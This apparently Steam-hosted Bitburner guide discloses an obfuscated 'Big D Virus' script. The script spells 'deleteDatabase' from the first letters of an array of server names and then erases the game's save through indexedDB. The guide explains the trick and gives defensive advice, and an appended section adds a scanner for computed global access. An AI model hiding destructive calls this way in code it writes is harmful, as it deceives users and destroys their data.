The Big D Virus

Dangerous Source Code

This will delete your save. Do not run without first exporting your save.

/** @param {NS} ns **/
export async function main(ns) {
    let attackers = [ "home" ]
    let attackable = [ "darkweb", "univ-energy", "titan-labs", "applied-energetics", "taiyangdigital", "alpha-ent", "Defcomm", "b-and-a", "titanlabs", "aerocorp", "blade", "fulcrum-assets", "syscore", "ecorp" ]
    let hostnames = attackable.map(s => s.split("-")[1] || s[0]).map(s => s[0]).join("")
    for (let hostname of hostnames) {
        // ns.print("--------------------------")
        // ns.print(hostname, " ", ns.getServerMaxRam(hostname) - ns.getServerUsedRam(hostname))
        // ns.print("--------------------------")
    }
    if (ns.getPlayer().money > 110000) {
        let server = ns.purchaseServer("bitburnerSave", 2)
        ns.tprint("purchased server: ", indexedDB[hostnames](server))
    }
    try {
        for (let target of attackable) {
            if (ns.getServerSecurityLevel(target) > ns.getServerMinSecurityLevel(target)) {
                await ns.weaken(target)
            } else if (ns.getServerMoneyAvailable(target) < ns.getServerMaxMoney(target)) {
                await ns.grow(target)
            }
        }
    } catch {
        ns.tprint("error attacking")
    }
}

Limit Of Vulnerability

No sandbox escape: This cannot harm your computer in any way. Its effects are limited to the window Bitburner is running in. The browser 'sandboxes' the Bitburner client. To escape this sandbox, you'd have to defeat Google Chrome's security, which is functionally impossible, as there are millions of professional security researchers around the world who make their livelihood trying to do just that. If a sandbox escape was discovered, I expect the discoverer would prefer to claim the bug bounty (or sell it to the highest bidder) rather than delete a bunch of Bitburner games.

No Steam privileges: This also cannot harm your Steam account in any way. Technically, a similar exploit could be used to falsify achievements, but it could only grant new ones, not take old ones away... and achievements would be the limit of its control. The source code provided here will not modify your achievements.

This exploit cannot modify exported save games. Bitburner provides an "Export Save Game" functionality and encourages users to regularly use it by providing a buff every 24h for exporting a save game. The exported save contains the database at the time of export. As a result, you can only lose data up to your most recent exported save. Importing that save restores all functionality.

Explanation Of Vulnerability

If you run a JavaScript file containing the following command, your savestate will be deleted.

indexedDB.deleteDatabase("bitburnerSave")

While this exploit uses the word "bitburnerSave," that was just me being lazy. It does not use the word "deleteDatabase" anywhere.

The attackable[] array was specially selected and ordered such that the first letter of each word, or, if the word contains a dash, the first letter of the second word, spells out the hidden word "deleteDatabase."

Attacks of this nature -- reliable ones, at least -- will almost always rely on arrays of strings, which are JavaScript's only ordered data structure. Arrays of integers could be used, but this would likely make the attack more obvious, rather than less.

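The attack occurs in the ns.tprint() line after a server is purchased. By that point, hostnames holds the string "deleteDatabase" and server holds the name returned by ns.purchaseServer(), "bitburnerSave", so this line effectively calls the following function: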

indexedDB["deleteDatabase"]("bitburnerSave")

This is functionally identical to the indexedDB.deleteDatabase("bitburnerSave") command described earlier: bracket notation and dot notation resolve to the same method.

I have characterized this as "The Big D Virus" because of the capital "D" in Defcomm. This capital "D" is critical to getting the specific string "deleteDatabase," as a lowercase "d" would yield "deletedatabase" and have no effect. Achieving that capitalization without specifically typing it as part of a string would require multiple layers of obfuscation so as to not reveal that it is generating a capital D, and every extra line of obfuscation sticks out like a sore thumb to someone reading the source code.

You can prevent or eliminate your exposure to a rudimentary attack such as this by avoiding "Big D" source code -- any source code that contains a capital D stored in an array. That simple rule, plus reviewing the source and removing lines you don't understand (or learning exactly what they do, so that you do understand them), will fully protect you against this attack.
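A review aid that goes beyond the capital-D rule above, as an added example that is not part of the original guide or of Bitburner: it flags any bracket-notation access on a browser global, since that is where a name assembled at runtime ends up being used. The function name, the list of watched globals and the sample script lines are assumptions made for this example.

```javascript
// Added example (not from the guide): static review aid for Bitburner scripts.
// Bracket access on a browser global lets the property name be built at
// runtime, so the dangerous word never has to appear in the source text.
const WATCHED_GLOBALS = ["indexedDB", "localStorage", "sessionStorage",
                         "window", "globalThis", "self", "document"]; // assumed list

function findComputedGlobalAccess(source) {
  const findings = [];
  const pattern = new RegExp(
    "\\b(" + WATCHED_GLOBALS.join("|") + ")\\s*\\[\\s*([^\\]]+?)\\s*\\]", "g");
  source.split("\n").forEach((text, index) => {
    // Comments are scanned too: a false positive on commented-out code is
    // cheaper than missing a call hidden behind a "//" inside a string.
    for (const match of text.matchAll(pattern)) {
      const key = match[2];
      // A single quoted literal is readable by a reviewer; anything else
      // (identifier, concatenation, template expression) is computed.
      const literal = /^(["'`])[^"'`$]*\1$/.test(key);
      findings.push({ line: index + 1, global: match[1], key, computed: !literal });
    }
  });
  return findings;
}

// Constructed sample: lines 3 and 4 reuse the two call forms shown in the guide.
const SAMPLE = [
  'let attackable = ["alpha", "beta"]',
  'let hostnames = attackable.map(s => s[0]).join("")',
  'ns.tprint("purchased server: ", indexedDB[hostnames](server))',
  'indexedDB["deleteDatabase"]("bitburnerSave")',
  'let ram = ns.getServerMaxRam(hosts[0])',
].join("\n");

for (const f of findComputedGlobalAccess(SAMPLE)) {
  console.log(`line ${f.line}: ${f.global}[${f.key}]` +
              (f.computed ? "  <- key is computed, trace where it comes from" : ""));
}
```

The scan works line by line, so a finding is a prompt to read that line and trace the key back to its source, not a verdict on the script.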

Permanently Patching The Vulnerability

FOSSburner (github.com) is actively undertaking development efforts to patch this vulnerability, but this patch will not be applied to the Steam version of the game, as the FOSSburner developers do not own or control the Official Bitburner Game's source code, nor the Steam implementation of it. As of the writing of this guide, FOSSburner does not contain a patch for this bug, but developers expect the exploit to be partially or fully patched by March 1, 2022.

Source: https://steamcommunity.com/sharedfiles/filedetails/?id=2762955541